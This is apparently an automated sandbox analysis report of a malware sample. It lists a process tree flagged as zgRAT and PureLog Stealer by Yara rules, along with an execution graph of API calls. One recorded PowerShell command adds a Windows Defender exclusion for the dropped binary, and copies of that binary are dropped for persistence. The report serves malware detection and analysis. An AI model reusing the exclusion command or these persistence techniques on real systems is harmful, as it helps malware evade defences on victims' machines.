                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:35
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\hyperContaineragent\Bridgecommon.exe'
                                                                                            Imagebase:0x7ff788560000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:36
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:37
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:38
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:41
                                                                                            Start time:17:52:21
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gMEBPrHPbx.bat"
                                                                                            Imagebase:0x7ff7574a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:42
                                                                                            Start time:17:52:21
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:43
                                                                                            Start time:17:52:21
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            Imagebase:0xdc0000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:44
                                                                                            Start time:17:52:22
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            Imagebase:0x430000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:45
                                                                                            Start time:17:52:22
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:chcp 65001
                                                                                            Imagebase:0x7ff7211c0000
                                                                                            File size:14'848 bytes
                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:46
                                                                                            Start time:17:52:22
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                                            Imagebase:0xe00000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 83%, ReversingLabs
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:47
                                                                                            Start time:17:52:22
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                                            Imagebase:0x820000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:48
                                                                                            Start time:17:52:22
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\w32tm.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                            Imagebase:0x7ff7b79a0000
                                                                                            File size:108'032 bytes
                                                                                            MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:49
                                                                                            Start time:17:52:28
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                            Imagebase:0x7ff693ab0000
                                                                                            File size:496'640 bytes
                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:50
                                                                                            Start time:17:52:28
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                                            Imagebase:0x3d0000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 83%, ReversingLabs
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:51
                                                                                            Start time:17:52:31
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                            Imagebase:0x7ff6eef20000
                                                                                            File size:55'320 bytes
                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:52
                                                                                            Start time:17:52:32
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                                            Imagebase:0x60000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:53
                                                                                            Start time:17:52:41
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\hyperContaineragent\Bridgecommon.exe"
                                                                                            Imagebase:0xb60000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:54
                                                                                            Start time:17:52:49
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                                            Imagebase:0xd90000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:55
                                                                                            Start time:17:52:57
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\hyperContaineragent\Bridgecommon.exe"
                                                                                            Imagebase:0x220000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:56
                                                                                            Start time:17:53:06
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                                            Imagebase:0x830000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:57
                                                                                            Start time:17:53:15
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\hyperContaineragent\Bridgecommon.exe"
                                                                                            Imagebase:0xc80000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:9.5%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:9.4%
                                                                                              Total number of Nodes:1517
                                                                                              Total number of Limit Nodes:41
                                                                                              execution_graph 25434 cb62ca 123 API calls __InternalCxxFrameHandler 23485 cbdec2 23486 cbdecf 23485->23486 23493 cae617 23486->23493 23494 cae627 23493->23494 23505 cae648 23494->23505 23497 ca4092 23528 ca4065 23497->23528 23500 cbb568 PeekMessageW 23501 cbb5bc 23500->23501 23502 cbb583 GetMessageW 23500->23502 23503 cbb599 IsDialogMessageW 23502->23503 23504 cbb5a8 TranslateMessage DispatchMessageW 23502->23504 23503->23501 23503->23504 23504->23501 23511 cad9b0 23505->23511 23508 cae66b LoadStringW 23509 cae645 23508->23509 23510 cae682 LoadStringW 23508->23510 23509->23497 23510->23509 23516 cad8ec 23511->23516 23513 cad9cd 23514 cad9e2 23513->23514 23524 cad9f0 26 API calls 23513->23524 23514->23508 23514->23509 23517 cad904 23516->23517 23523 cad984 _strncpy 23516->23523 23519 cad928 23517->23519 23525 cb1da7 WideCharToMultiByte 23517->23525 23522 cad959 23519->23522 23526 cae5b1 50 API calls __vsnprintf 23519->23526 23527 cc6159 26 API calls 3 library calls 23522->23527 23523->23513 23524->23514 23525->23519 23526->23522 23527->23523 23529 ca407c __vsnwprintf_l 23528->23529 23532 cc5fd4 23529->23532 23535 cc4097 23532->23535 23536 cc40bf 23535->23536 23537 cc40d7 23535->23537 23559 cc91a8 20 API calls _abort 23536->23559 23537->23536 23538 cc40df 23537->23538 23561 cc4636 23538->23561 23541 cc40c4 23560 cc9087 26 API calls _abort 23541->23560 23546 cc4167 23570 cc49e6 51 API calls 4 library calls 23546->23570 23547 ca4086 SetDlgItemTextW 23547->23500 23550 cc40cf 23552 cbfbbc 23550->23552 23551 cc4172 23571 cc46b9 20 API calls _free 23551->23571 23553 cbfbc5 IsProcessorFeaturePresent 23552->23553 23554 cbfbc4 23552->23554 23556 cbfc07 23553->23556 23554->23547 23572 cbfbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23556->23572 23558 cbfcea 23558->23547 23559->23541 23560->23550 23562 cc4653 23561->23562 23568 cc40ef 23561->23568 23562->23568 23573 cc97e5 GetLastError 23562->23573 23564 cc4674 23593 cc993a 38 API calls __fassign 23564->23593 23566 cc468d 23594 cc9967 38 API calls __fassign 23566->23594 23569 cc4601 20 API calls 2 library calls 23568->23569 23569->23546 23570->23551 23571->23550 23572->23558 23574 cc97fb 23573->23574 23575 cc9801 23573->23575 23595 ccae5b 11 API calls 2 library calls 23574->23595 23580 cc9850 SetLastError 23575->23580 23596 ccb136 23575->23596 23579 cc981b 23603 cc8dcc 23579->23603 23580->23564 23583 cc9830 23583->23579 23585 cc9837 23583->23585 23584 cc9821 23586 cc985c SetLastError 23584->23586 23610 cc9649 20 API calls _abort 23585->23610 23611 cc8d24 38 API calls _abort 23586->23611 23589 cc9842 23591 cc8dcc _free 20 API calls 23589->23591 23592 cc9849 23591->23592 23592->23580 23592->23586 23593->23566 23594->23568 23595->23575 23601 ccb143 _abort 23596->23601 23597 ccb183 23613 cc91a8 20 API calls _abort 23597->23613 23598 ccb16e RtlAllocateHeap 23599 cc9813 23598->23599 23598->23601 23599->23579 23609 ccaeb1 11 API calls 2 library calls 23599->23609 23601->23597 23601->23598 23612 cc7a5e 7 API calls 2 library calls 23601->23612 23604 cc8dd7 RtlFreeHeap 23603->23604 23608 cc8e00 _free 23603->23608 23605 cc8dec 23604->23605 23604->23608 23614 cc91a8 20 API calls _abort 23605->23614 23607 cc8df2 GetLastError 23607->23608 23608->23584 23609->23583 23610->23589 23612->23601 23613->23599 23614->23607 25408 cbb5c0 100 API calls 25450 cb77c0 118 API calls 25451 cbffc0 RaiseException _com_raise_error _com_error::_com_error 25436 cc0ada 51 API calls 2 library calls 25373 cbf4d3 20 API calls 23727 cbe1d1 14 API calls ___delayLoadHelper2@8 23729 cbe2d7 23731 cbe1db 23729->23731 23730 cbe85d ___delayLoadHelper2@8 14 API calls 23730->23731 23731->23730 25452 cca3d0 21 API calls 2 library calls 25453 cd2bd0 VariantClear 23734 ca10d5 23739 ca5abd 23734->23739 23740 ca5ac7 __EH_prolog 23739->23740 23746 cab505 23740->23746 23742 ca5ad3 23752 ca5cac GetCurrentProcess GetProcessAffinityMask 23742->23752 23747 cab50f __EH_prolog 23746->23747 23753 caf1d0 82 API calls 23747->23753 23749 cab521 23754 cab61e 23749->23754 23753->23749 23755 cab630 _abort 23754->23755 23758 cb10dc 23755->23758 23761 cb109e GetCurrentProcess GetProcessAffinityMask 23758->23761 23762 cab597 23761->23762 23762->23742 25410 caf1e8 FreeLibrary 23769 cbb7e0 23770 cbb7ea __EH_prolog 23769->23770 23937 ca1316 23770->23937 23773 cbb82a 23776 cbb89b 23773->23776 23777 cbb838 23773->23777 23853 cbb841 23773->23853 23774 cbbf0f 24009 cbd69e 23774->24009 23781 cbb92e GetDlgItemTextW 23776->23781 23787 cbb8b1 23776->23787 23782 cbb878 23777->23782 23783 cbb83c 23777->23783 23779 cbbf2a SendMessageW 23780 cbbf38 23779->23780 23784 cbbf52 GetDlgItem SendMessageW 23780->23784 23785 cbbf41 SendDlgItemMessageW 23780->23785 23781->23782 23786 cbb96b 23781->23786 23790 cbb95f KiUserCallbackDispatcher 23782->23790 23782->23853 23788 cae617 53 API calls 23783->23788 23783->23853 24027 cba64d GetCurrentDirectoryW 23784->24027 23785->23784 23791 cbb980 GetDlgItem 23786->23791 23935 cbb974 23786->23935 23792 cae617 53 API calls 23787->23792 23793 cbb85b 23788->23793 23790->23853 23795 cbb9b7 SetFocus 23791->23795 23796 cbb994 SendMessageW SendMessageW 23791->23796 23797 cbb8ce SetDlgItemTextW 23792->23797 24049 ca124f SHGetMalloc 23793->24049 23794 cbbf82 GetDlgItem 23799 cbbf9f 23794->23799 23800 cbbfa5 SetWindowTextW 23794->23800 23801 cbb9c7 23795->23801 23814 cbb9e0 23795->23814 23796->23795 23802 cbb8d9 23797->23802 23799->23800 24028 cbabab GetClassNameW 23800->24028 23806 cae617 53 API calls 23801->23806 23810 cbb8e6 GetMessageW 23802->23810 23802->23853 23803 cbb862 23813 cbc1fc SetDlgItemTextW 23803->23813 23803->23853 23804 cbbe55 23808 cae617 53 API calls 23804->23808 23807 cbb9d1 23806->23807 24050 cbd4d4 23807->24050 23815 cbbe65 SetDlgItemTextW 23808->23815 23811 cbb8fd IsDialogMessageW 23810->23811 23810->23853 23811->23802 23817 cbb90c TranslateMessage DispatchMessageW 23811->23817 23813->23853 23820 cae617 53 API calls 23814->23820 23818 cbbe79 23815->23818 23817->23802 23822 cae617 53 API calls 23818->23822 23821 cbba17 23820->23821 23826 ca4092 _swprintf 51 API calls 23821->23826 23855 cbbe9c _wcslen 23822->23855 23823 cbbff0 23825 cbc020 23823->23825 23830 cae617 53 API calls 23823->23830 23831 cbc0d8 23825->23831 23836 cbc73f 97 API calls 23825->23836 23832 cbba29 23826->23832 23827 cbb9d9 23947 caa0b1 23827->23947 23828 cbc73f 97 API calls 23828->23823 23835 cbc003 SetDlgItemTextW 23830->23835 23837 cbc18b 23831->23837 23867 cbc169 23831->23867 23881 cae617 53 API calls 23831->23881 23838 cbd4d4 16 API calls 23832->23838 23833 cbba73 23953 cbac04 SetCurrentDirectoryW 23833->23953 23834 cbba68 GetLastError 23834->23833 23839 cae617 53 API calls 23835->23839 23841 cbc03b 23836->23841 23842 cbc19d 23837->23842 23843 cbc194 EnableWindow 23837->23843 23838->23827 23845 cbc017 SetDlgItemTextW 23839->23845 23854 cbc04d 23841->23854 23872 cbc072 23841->23872 23844 cbc1ba 23842->23844 24068 ca12d3 GetDlgItem EnableWindow 23842->24068 23843->23842 23850 cbc1e1 23844->23850 23863 cbc1d9 SendMessageW 23844->23863 23845->23825 23846 cbba87 23851 cbba9e 23846->23851 23852 cbba90 GetLastError 23846->23852 23847 cae617 53 API calls 23847->23853 23848 cbc0cb 23857 cbc73f 97 API calls 23848->23857 23850->23853 23864 cae617 53 API calls 23850->23864 23860 cbbb20 23851->23860 23865 cbbaae GetTickCount 23851->23865 23911 cbbb11 23851->23911 23852->23851 24066 cb9ed5 32 API calls 23854->24066 23859 cae617 53 API calls 23855->23859 23882 cbbeed 23855->23882 23856 cbc1b0 24069 ca12d3 GetDlgItem EnableWindow 23856->24069 23857->23831 23866 cbbed0 23859->23866 23868 cbbcfb 23860->23868 23869 cbbb39 GetModuleFileNameW 23860->23869 23870 cbbcf1 23860->23870 23861 cbbd56 23969 ca12f1 GetDlgItem ShowWindow 23861->23969 23863->23850 23864->23803 23874 ca4092 _swprintf 51 API calls 23865->23874 23875 ca4092 _swprintf 51 API calls 23866->23875 24067 cb9ed5 32 API calls 23867->24067 23878 cae617 53 API calls 23868->23878 24060 caf28c 82 API calls 23869->24060 23870->23782 23870->23868 23871 cbc066 23871->23872 23872->23848 23886 cbc73f 97 API calls 23872->23886 23880 cbbac7 23874->23880 23875->23882 23885 cbbd05 23878->23885 23879 cbbd66 23970 ca12f1 GetDlgItem ShowWindow 23879->23970 23954 ca966e 23880->23954 23881->23831 23882->23847 23883 cbc188 23883->23837 23884 cbbb5f 23888 ca4092 _swprintf 51 API calls 23884->23888 23889 ca4092 _swprintf 51 API calls 23885->23889 23890 cbc0a0 23886->23890 23893 cbbb81 CreateFileMappingW 23888->23893 23894 cbbd23 23889->23894 23890->23848 23895 cbc0a9 DialogBoxParamW 23890->23895 23891 cbbd70 23896 cae617 53 API calls 23891->23896 23899 cbbbe3 GetCommandLineW 23893->23899 23931 cbbc60 __InternalCxxFrameHandler 23893->23931 23908 cae617 53 API calls 23894->23908 23895->23782 23895->23848 23897 cbbd7a SetDlgItemTextW 23896->23897 23971 ca12f1 GetDlgItem ShowWindow 23897->23971 23898 cbbaed 23902 cbbaff 23898->23902 23903 cbbaf4 GetLastError 23898->23903 23904 cbbbf4 23899->23904 23900 cbbc6b ShellExecuteExW 23926 cbbc88 23900->23926 23962 ca959a 23902->23962 23903->23902 24061 cbb425 SHGetMalloc 23904->24061 23905 cbbd8c SetDlgItemTextW GetDlgItem 23909 cbbda9 GetWindowLongW SetWindowLongW 23905->23909 23910 cbbdc1 23905->23910 23913 cbbd3d 23908->23913 23909->23910 23972 cbc73f 23910->23972 23911->23860 23911->23861 23912 cbbc10 24062 cbb425 SHGetMalloc 23912->24062 23917 cbbc1c 24063 cbb425 SHGetMalloc 23917->24063 23918 cbbccb 23918->23870 23924 cbbce1 UnmapViewOfFile CloseHandle 23918->23924 23919 cbc73f 97 API calls 23921 cbbddd 23919->23921 23997 cbda52 23921->23997 23922 cbbc28 24064 caf3fa 82 API calls 2 library calls 23922->24064 23924->23870 23926->23918 23929 cbbcb7 Sleep 23926->23929 23928 cbbc3f MapViewOfFile 23928->23931 23929->23918 23929->23926 23930 cbc73f 97 API calls 23934 cbbe03 23930->23934 23931->23900 23932 cbbe2c 24065 ca12d3 GetDlgItem EnableWindow 23932->24065 23934->23932 23936 cbc73f 97 API calls 23934->23936 23935->23782 23935->23804 23936->23932 23938 ca1378 23937->23938 23939 ca131f 23937->23939 24071 cae2c1 GetWindowLongW SetWindowLongW 23938->24071 23941 ca1385 23939->23941 24070 cae2e8 62 API calls 2 library calls 23939->24070 23941->23773 23941->23774 23941->23853 23943 ca1341 23943->23941 23944 ca1354 GetDlgItem 23943->23944 23944->23941 23945 ca1364 23944->23945 23945->23941 23946 ca136a SetWindowTextW 23945->23946 23946->23941 23950 caa0bb 23947->23950 23948 caa14c 23949 caa2b2 8 API calls 23948->23949 23952 caa175 23948->23952 23949->23952 23950->23948 23950->23952 24072 caa2b2 23950->24072 23952->23833 23952->23834 23953->23846 23955 ca9678 23954->23955 23956 ca96d5 CreateFileW 23955->23956 23957 ca96c9 23955->23957 23956->23957 23958 cabb03 GetCurrentDirectoryW 23957->23958 23960 ca971f 23957->23960 23959 ca9704 23958->23959 23959->23960 23961 ca9708 CreateFileW 23959->23961 23960->23898 23961->23960 23963 ca95be 23962->23963 23964 ca95cf 23962->23964 23963->23964 23965 ca95ca 23963->23965 23966 ca95d1 23963->23966 23964->23911 24093 ca974e 23965->24093 24098 ca9620 23966->24098 23969->23879 23970->23891 23971->23905 23973 cbc749 __EH_prolog 23972->23973 23974 cbbdcf 23973->23974 23975 cbb314 ExpandEnvironmentStringsW 23973->23975 23974->23919 23983 cbc780 _wcslen _wcsrchr 23975->23983 23977 cbb314 ExpandEnvironmentStringsW 23977->23983 23978 cbca67 SetWindowTextW 23978->23983 23981 cc3e3e 22 API calls 23981->23983 23983->23974 23983->23977 23983->23978 23983->23981 23984 cbc855 SetFileAttributesW 23983->23984 23990 cbcc31 GetDlgItem SetWindowTextW SendMessageW 23983->23990 23993 cbcc71 SendMessageW 23983->23993 24113 cb1fbb CompareStringW 23983->24113 24114 cba64d GetCurrentDirectoryW 23983->24114 24116 caa5d1 6 API calls 23983->24116 24117 caa55a FindClose 23983->24117 24118 cbb48e 76 API calls 2 library calls 23983->24118 23986 cbc90f GetFileAttributesW 23984->23986 23987 cbc86f _abort _wcslen 23984->23987 23986->23983 23989 cbc921 DeleteFileW 23986->23989 23987->23983 23987->23986 24115 cab991 51 API calls 2 library calls 23987->24115 23989->23983 23994 cbc932 23989->23994 23990->23983 23991 ca4092 _swprintf 51 API calls 23992 cbc952 GetFileAttributesW 23991->23992 23992->23994 23995 cbc967 MoveFileW 23992->23995 23993->23983 23994->23991 23995->23983 23996 cbc97f MoveFileExW 23995->23996 23996->23983 23998 cbda5c __EH_prolog 23997->23998 24119 cb0659 23998->24119 24000 cbda8d 24123 ca5b3d 24000->24123 24002 cbdaab 24127 ca7b0d 24002->24127 24006 cbdafe 24143 ca7b9e 24006->24143 24008 cbbdee 24008->23930 24010 cbd6a8 24009->24010 24635 cba5c6 24010->24635 24013 cbbf15 24013->23779 24013->23780 24014 cbd6b5 GetWindow 24014->24013 24017 cbd6d5 24014->24017 24015 cbd6e2 GetClassNameW 24640 cb1fbb CompareStringW 24015->24640 24017->24013 24017->24015 24018 cbd76a GetWindow 24017->24018 24019 cbd706 GetWindowLongW 24017->24019 24018->24013 24018->24017 24019->24018 24020 cbd716 SendMessageW 24019->24020 24020->24018 24021 cbd72c GetObjectW 24020->24021 24641 cba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24021->24641 24024 cbd743 24642 cba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24024->24642 24643 cba80c 8 API calls 24024->24643 24026 cbd754 SendMessageW DeleteObject 24026->24018 24027->23794 24029 cbabcc 24028->24029 24030 cbabf1 24028->24030 24646 cb1fbb CompareStringW 24029->24646 24032 cbabff 24030->24032 24033 cbabf6 SHAutoComplete 24030->24033 24036 cbb093 24032->24036 24033->24032 24034 cbabdf 24034->24030 24035 cbabe3 FindWindowExW 24034->24035 24035->24030 24037 cbb09d __EH_prolog 24036->24037 24038 ca13dc 84 API calls 24037->24038 24039 cbb0bf 24038->24039 24647 ca1fdc 24039->24647 24042 cbb0eb 24044 ca19af 128 API calls 24042->24044 24043 cbb0d9 24045 ca1692 86 